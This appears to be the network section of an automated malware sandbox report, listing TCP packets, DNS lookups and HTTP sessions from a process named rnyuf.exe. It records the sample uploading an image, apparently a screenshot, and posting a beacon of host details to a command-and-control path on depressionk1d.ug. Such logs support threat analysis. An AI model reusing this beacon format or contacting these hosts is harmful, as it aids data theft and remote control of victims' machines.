                          Nov 12, 2021 22:24:56.767446041 CET5023080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.767462969 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767600060 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767616034 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767632008 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767749071 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767791033 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767925978 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767939091 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.767954111 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.773859024 CET5023180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.790249109 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.790286064 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.790303946 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.790323973 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.793869972 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.793968916 CET5023080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.796324015 CET8050231178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.796441078 CET5023180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.797413111 CET5023180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.819835901 CET8050231178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.828036070 CET8050231178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.828128099 CET5023180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.955440998 CET5023180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.955753088 CET5023080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.956931114 CET5023280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.978797913 CET8050231178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.978846073 CET8050230178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.978899002 CET5023180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.978974104 CET5023080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.979619980 CET8050232178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:56.979726076 CET5023280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:56.983191013 CET5023280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.005547047 CET8050232178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.020462990 CET8050232178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.020544052 CET5023280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.133037090 CET5023280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.134773970 CET5023380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.157177925 CET8050233178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.157409906 CET5023380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.157424927 CET8050232178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.157505035 CET5023280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.158143044 CET5023380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.181601048 CET8050233178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.190752983 CET8050233178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.190869093 CET5023380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.306682110 CET5023380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.329082012 CET8050233178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.329199076 CET5023380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.381639957 CET5023480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.404090881 CET8050234178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.404345036 CET5023480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.405000925 CET5023480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.427360058 CET8050234178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.434370995 CET8050234178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.434480906 CET5023480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.538360119 CET5023480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.540138960 CET5023580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.562417984 CET8050234178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.562573910 CET5023480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.563322067 CET8050235178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.563466072 CET5023580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.564311028 CET5023580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.587018967 CET8050235178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.599610090 CET8050235178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.599812984 CET5023580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.711083889 CET5023580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.712762117 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.733715057 CET8050235178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.733829975 CET5023580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.738568068 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.738687992 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.739643097 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.761935949 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.766443014 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.766556025 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.826219082 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.826420069 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.826664925 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.826797962 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.849914074 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.850322008 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.850336075 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.850351095 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.850364923 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.850378036 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.850434065 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.850497007 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873073101 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873091936 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873120070 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873142958 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873178959 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873207092 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873223066 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873239040 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873249054 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873253107 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873306036 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873322964 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873339891 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873370886 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873421907 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.873424053 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.873493910 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.885513067 CET5023780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.896421909 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896451950 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896466970 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896481037 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896493912 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896507978 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896522999 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896537066 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896550894 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896564007 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896589041 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896604061 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896614075 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896617889 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.896629095 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896644115 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896657944 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896672964 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896687031 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.896699905 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.898711920 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.908785105 CET8050237178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.908876896 CET5023780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.910067081 CET5023780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.919897079 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.919917107 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.919925928 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.919953108 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.919966936 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.924544096 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.924637079 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:57.933233976 CET8050237178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.936794043 CET8050237178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:57.936867952 CET5023780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.054259062 CET5023780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.054682016 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.056237936 CET5023880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.078578949 CET8050237178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.078608036 CET8050238178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.078646898 CET5023780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.078735113 CET5023880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.078879118 CET8050236178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.078988075 CET5023680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.079689026 CET5023880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.102268934 CET8050238178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.107564926 CET8050238178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.107652903 CET5023880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.227544069 CET5023880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.231188059 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.250361919 CET8050238178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.250510931 CET5023880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.256658077 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.259053946 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.259754896 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.283714056 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.286691904 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.286782026 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.403852940 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.404019117 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.404156923 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.404182911 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.426518917 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.426554918 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.426573038 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.426588058 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.426630020 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.426749945 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.426808119 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.428145885 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.428675890 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.449227095 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449287891 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449323893 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449359894 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449398041 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449461937 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.449522972 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.449697971 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449744940 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449769020 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.449771881 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.449853897 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.451369047 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.451387882 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.451500893 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.472740889 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.472769022 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.472784996 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.472800016 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.472928047 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.473000050 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:58.474881887 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474909067 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474925041 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474940062 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474953890 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474968910 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474983931 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.474998951 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.475013971 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.476636887 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.495680094 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.495707989 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.495718956 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.495733976 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.496625900 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.499691963 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:58.502841949 CET5023980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:25:03.499192953 CET8050239178.208.83.45192.168.2.4
                          Nov 12, 2021 22:25:03.499305010 CET5023980192.168.2.4178.208.83.45

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 12, 2021 22:23:06.647032976 CET4991053192.168.2.48.8.8.8
                          Nov 12, 2021 22:23:06.692743063 CET53499108.8.8.8192.168.2.4
                          Nov 12, 2021 22:23:07.023547888 CET5585453192.168.2.48.8.8.8
                          Nov 12, 2021 22:23:07.044467926 CET53558548.8.8.8192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Nov 12, 2021 22:23:06.647032976 CET192.168.2.48.8.8.80xe0e4Standard query (0)depressionk1d.ugA (IP address)IN (0x0001)
                          Nov 12, 2021 22:23:07.023547888 CET192.168.2.48.8.8.80x45b1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Nov 12, 2021 22:23:06.692743063 CET8.8.8.8192.168.2.40xe0e4No error (0)depressionk1d.ug178.208.83.45A (IP address)IN (0x0001)
                          Nov 12, 2021 22:23:07.044467926 CET8.8.8.8192.168.2.40x45b1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                          Nov 12, 2021 22:23:07.044467926 CET8.8.8.8192.168.2.40x45b1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                          Nov 12, 2021 22:23:07.044467926 CET8.8.8.8192.168.2.40x45b1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                          Nov 12, 2021 22:23:07.044467926 CET8.8.8.8192.168.2.40x45b1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                          Nov 12, 2021 22:23:07.044467926 CET8.8.8.8192.168.2.40x45b1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • cdn.discordapp.com
                          • depressionk1d.ug

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.449785162.159.129.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.449800162.159.129.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          10192.168.2.449791178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:13.779541969 CET1688OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:13.779721022 CET1689OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:13.779939890 CET1699OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:13.780093908 CET1701OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:13.803266048 CET1704OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:13.803297997 CET1707OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:13.803437948 CET1715OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:13.803755045 CET1718OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:13.803777933 CET1720OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:13.803821087 CET1722OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:13.803953886 CET1727OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:13.875251055 CET1799INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:13 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          100192.168.2.449885178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:40.510149002 CET6050OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:40.536098957 CET6051INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          101192.168.2.449886178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:40.666706085 CET6051OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
